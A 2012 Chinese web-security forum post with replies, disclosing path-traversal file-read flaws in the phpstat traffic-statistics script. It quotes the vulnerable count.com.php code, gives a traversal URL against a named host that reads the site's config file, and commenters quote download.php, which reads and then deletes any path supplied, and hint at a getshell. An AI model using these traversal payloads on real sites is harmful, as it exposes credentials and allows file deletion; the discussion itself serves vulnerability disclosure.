phpstat 读文件

2012-10-19 21:39:24 13 3126
./count/count.com.php
$website = $_GET[website];

        $image = $_GET[image];

        //确定图片

        if(!$image)

        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";

        else

        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;

        //发送图片

        

    header("Content-type: image/gif");

        readfile($imagesrc);

        @flush();
很2B,看一个站的时候发现。。
test
http://media.phpstat.net/count/count.com.php?image=../../../../include.inc/config.inc.php
类别 Web安全

关于作者

Cond0r136篇文章1277篇回复

Cond0r
13

评论13次

要评论?请先  登录  或  注册
  • 13楼
    l4yn3liu
    Rank: 1
    2012-10-22 00:05

    有时间,找这套源码来读读....看来问题不少

  • 12楼
    l4yn3liu
    Rank: 1
    2012-10-22 00:04

    上面这里不成了任意删除么? unlink($fpath)了。。。。。

  • 11楼
    东兰sky
    Rank: 1
    2012-10-21 10:42

    神奇。。

  • 10楼
    Cond0r
    Rank: 1
    2012-10-20 23:51

    这个我也看到了。不过目标站着几个文件被删了,我就没怎么看了

  • 9楼
    anlfi
    Rank: 2
    2012-10-20 20:19

    懂的站长 一个 basename 函数 漏洞就没用鸟 =========================================== 官方没有找到(phpstat3.2) ../download.php 23==>$fpath = strval($_GET['fpath']); 25==>$file = fopen($fpath, "r"); 30==>fread echo fread($file, filesize($fpath));

        <?     /*      本软件版权归作者所有,在投入使用之前注意获取许可      作者:程威(wiwiboy)      项目:PCS流量统计 3.0      电话:13553166317      邮箱:[email][email protected][/email]      QQ号:158839753      网址:[url]http://www.pcs.net[/url]      pcs.net保留全部权力,受相关法律和国际                                               公约保护,请勿非法修改、转载、散播,或用于其他赢利行为,                                并请勿删除版权声明。     */     /*                  verson:v3.0 20060618             author:wiwiboy             last update:2006/10/14      */     /*             xml.cxv,txt文件下载页     */             $fname = strval($_GET[fname]);             $fpath = strval($_GET[fpath]);             if(!file_exists($fpath))exit;             $file=fopen($fpath,"r");             Header("Content-type: application/octet-stream");             Header("Accept-Ranges: bytes");             Header("Accept-Length: ".filesize($fpath));             Header("Content-Disposition: attachment; filename=" . $fname."");             echo fread($file,filesize($fpath));             fclose($file);             @unlink($fpath);     ?>
    ../getcode.php getshell 支持lz

  • 8楼
    唐门三少
    Rank: 1
    2012-10-20 17:00

    开发人员太放松警惕了,居然什么检查都不做就直接扔到函数里了

  • 7楼
    泪少
    Rank: 1
    2012-10-20 12:27

  • 6楼
    dllk
    Rank: 2
    2012-10-20 10:38

    弯的four

  • 5楼
    冰封
    Rank: 1
    2012-10-20 00:00

    readfile flush 两函数也要加入到工具里扫了 算是危险函数了

  • 4楼
    yezi
    Rank: 1
    2012-10-19 23:01

    挤一挤。

  • 3楼
    毅心毅意
    Rank: 1
    2012-10-19 22:44

    这个犀利了。。。。连截断都不用。。。。。

  • 2楼
    sunshine
    Rank: 2
    2012-10-19 22:44

    八错。。呵呵

  • 1楼
    errorera
    Rank: 1
    2012-10-19 22:19

    沙发